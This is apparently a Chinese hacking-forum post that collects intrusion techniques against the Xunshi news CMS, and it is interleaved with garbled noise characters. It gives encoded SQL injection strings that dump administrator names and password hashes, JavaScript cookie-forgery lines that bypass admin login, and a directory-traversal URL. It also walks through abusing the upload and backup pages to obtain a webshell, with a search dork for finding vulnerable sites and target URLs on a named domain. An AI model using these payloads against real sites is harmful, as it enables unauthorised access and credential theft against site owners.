讯时漏洞总结

admin

by:血封忆尘
- A0 ^( ~! Q! b4 t) k5 F  X# J5 W. ?
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

以下本文总结来自黑防去年第9期杂志上的内容...
7 O' Q! T1 v; H9 X9 w# B& K
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
" P' u9 J0 M; D  a* u5 A
8 H! t2 g$ V1 \+ Y26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

4 o; |, \' ]3 {6 C) V记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
3 `( I1 v- v. s5 G这里一个注入

效果如图:



9 a/ n/ F- H! n- N1 q这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
3 W! h: b1 \5 z7 E7 @( A5 M
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
) J; q+ \2 C3 r& |
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
9 \' B3 h* |# R5 X6 v
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
4 Q5 k! A  U* i/ W' N4 d: y% R9 w
& ]6 T8 o0 `' B; D# I2 m$ ]) B访问这页面来列目录..步骤如下:
# v( {. ]5 t2 M+ q) X4 m& v  ~. `
javascript:alert(document.cookie="admindj=1")

* ?/ d/ W1 M4 _! e& g/ H9 ~http://www.political-security.co ... asp?id=46&dir=../..

效果如图:
3 G5 g* K( H% y; L7 m


这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell？？上传--备份就ok了..
. o, I" V) E# m3 _7 Z: e( h
那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
* B/ C  c+ g% C8 U
' V+ Q9 v( Y- k" z/ {0 m: f这个我也碰到过一次..你都可以通过列目录来实现..
+ c/ `: i, N7 y$ K8 J
6 W, [& Y( I# l6 `- x4 C2 djavascript:alert(document.cookie="admindj=1")
6 c) Y  ?. g3 G  Q* c) c
! d0 r: r6 K& c" J) ?3 @$ m# Q) f. shttp://www.political-security.co ... p?action=BackupData

3 k0 t& s3 o& c- O6 R备份ok..

那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?

在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下

然后访问此页面进行注入..步骤如下:

) O7 o' G* V$ `javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
/ q* ]! i- R4 {1 `. w( k6 Q
然后请求admin/admin_chk.asp页面
4 F4 B8 L, T) C; o
5 @3 H' {2 z4 }) M0 m2 E  k输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
- T' \' t5 Q& ^+ J8 s, G
( I/ k6 r' d9 z1 z26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
) D: x8 h" ]& }# D
+ q, X- _2 L1 G# [( j效果如图所示:
8 V& n" A9 q/ g" U( T

8 x( l  q: m$ ^1 x
8 i, r. N( f4 `3 T讯时漏洞2
google关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
1 n4 t5 ~2 m" @- n
3 x3 H( K6 h. W; n- m0 L/ y9 p1、/admin/admin_news_pl_view.asp?id=1
/ ]- ^1 Y1 |/ r. I/ N//id任意 填入以下语句

, j$ u" p9 F9 e( s; e2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！
2 @& @% b- B% g( D8 n, t$ _
1 r7 _3 h5 r6 b- W1 I1 m1 r

$ X4 t& m+ {( l3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='

3 i' E6 L, }2 A/ m! P
* _- w: p0 v( G0 w( i- S9 m: m
6 e& b* {5 [% K3 U爆出管理员帐号和密码了
+ d! F5 X  }7 ~9 B2 C  k9 S; P


4、cookies进后台
  m0 a- s+ A6 V! [. {
3 T& x5 @2 T+ Bjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));


' Z6 b) }6 T) T! y
5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！


) c) Q1 z9 C! _9 ^( F; T
9 z5 ~) u$ i* W, U$ j6、后台有上传和备份取SHELL不难。
3 j5 r% G" R4 s, w/ b2 P: r1 ^
7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..
& m. b4 R9 x' ]& S3 o
# }4 y7 Y) i2 ?# L逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！